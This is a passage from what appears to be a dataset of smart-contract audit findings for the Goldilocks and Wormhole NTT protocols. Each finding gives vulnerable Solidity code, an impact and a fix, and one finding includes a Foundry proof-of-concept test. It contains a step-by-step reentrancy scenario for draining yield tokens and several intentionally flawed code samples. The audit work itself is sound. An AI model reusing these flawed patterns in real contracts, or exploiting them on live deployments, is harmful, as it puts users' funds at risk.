(initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members and they can't unstake forever. Furthermore, in `stake()`, it just prevents seed investors, not team members. 
So if team members have staked additionally, they can't unstake either.ч`_vestingCheck` should use the same logic as initial investors for team members.чTeam members can't unstake forever.ч```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n -In `GovLocks`, it shouldn't use a `deposits` mappingчhighчIn `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. 
Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.чWe don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.чUsers wouldn't be able to withdraw `LOCKS` with `govLOCKS`.ч```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n -Some functions of `Goldilend` will revert forever.чhighч`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they doesn't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` has all `ibgt` of `Goldilend`, they should withdraw from 
`ibgtVault` first.ч3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\nч`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.ч```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n -`Goldigovernor._getProposalState()` shouldn't use `totalSupply`чmediumчIn `_getProposalState()`, it uses `Goldiswap(goldiswap).totalSupply()` during the comparison.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage 
proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nAs `totalSupply` is increasing in real time, a `Queued` proposal might be changed to `Defeated` one unexpectedly due to the increased supply.чWe should introduce another mechanism for the quorum check rather than using `totalSupply`.чA proposal state might be changed unexpectedly.ч```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n -In `Goldivault.redeemYield()`, users can redeem more yield tokens using reentrancyчmediumчPossible 
reentrancy in `Goldivault.redeemYield()` if `yieldToken` has a `beforeTokenTransfer` hook.\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100 and the user has 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\nThen `yt.totalSupply` will be changed to 90 and it will transfer `100 * 10 / 100 = 10 yieldToken` to the user.\\nInside the `beforeTokenTransfer` hook, the user calls `redeemYield()` again with 10 yt.\\nAs `yieldToken.balance` is still 100, he will receive `100 * 10 / 90 = 11 yieldToken`.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\nчWe should add a `nonReentrant` modifier to `redeemYield()`.чMalicious users can steal `yieldToken` using `redeemYield()`.ч```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = 
ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n -Wrong validation in `Goldigovernor.cancel()`чmediumчIn `Goldigovernor.cancel()`, the proposer should have fewer votes than `proposalThreshold` to cancel his proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\nчIt should be modified like this.\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert Error;\\n```\\nчA proposer can't cancel his proposal unless he decreases his voting power.ч```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength 
= proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n -Users wouldn't cancel their proposals due to the increased `proposalThreshold`.чmediumчWhen users call `cancel()`, it validates the caller's voting power with `proposalThreshold` which can be changed using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user has proposed a proposal using `propose()`.\\nAfter that, `proposalThreshold` was increased to 150 by `multisig`.\\nWhen the user calls `cancel()`, it will revert as he doesn't have enough voting power.чIt would be good to cache `proposalThreshold` as a proposal state.чUsers wouldn't cancel their proposals due to the increased `proposalThreshold`.ч```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n -`Goldilend.liquidate()` might revert due to underflowчmediumчIn `repay()`, there would be a rounding during the `interest` 
calculation.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers of `borrowedAmount = 100, `interest` = 10`. And `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10. 
And `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, it will revert at L448 because `outstandingDebt = 89 < borrowedAmount - `interest` = 90`.чIn `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\nч`liquidate()` might revert due to underflow.ч```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? 
outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n -In `Goldigovernor`, wrong assumption of block timeчmediumчIn `Goldigovernor.sol`, voting period/delay limits are set with 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits will be set shorter than expected.чWe should calculate these limits with 5s block time.чVoting period/delay limits will be set shorter than expected.ч```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n -Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect orderчhighчIn the case of multiple Transceivers, the 
current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.чWhen the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.чThe sender's funds are transferred to the NTT Manager when messages are queued. 
However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = \"https://goerli.blockpi.network/v1/rpc/public\";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), \"\")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n 
address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), \"\"))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), \"\"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), \"\")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), \"\"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n 
nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, \"Threshold is zero with active transceivers\");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, 
decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\nч```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, 
offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n -Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completionчhighчWhen a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. 
This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\nчConsider passing no instructions into the delivery price estimation when the 
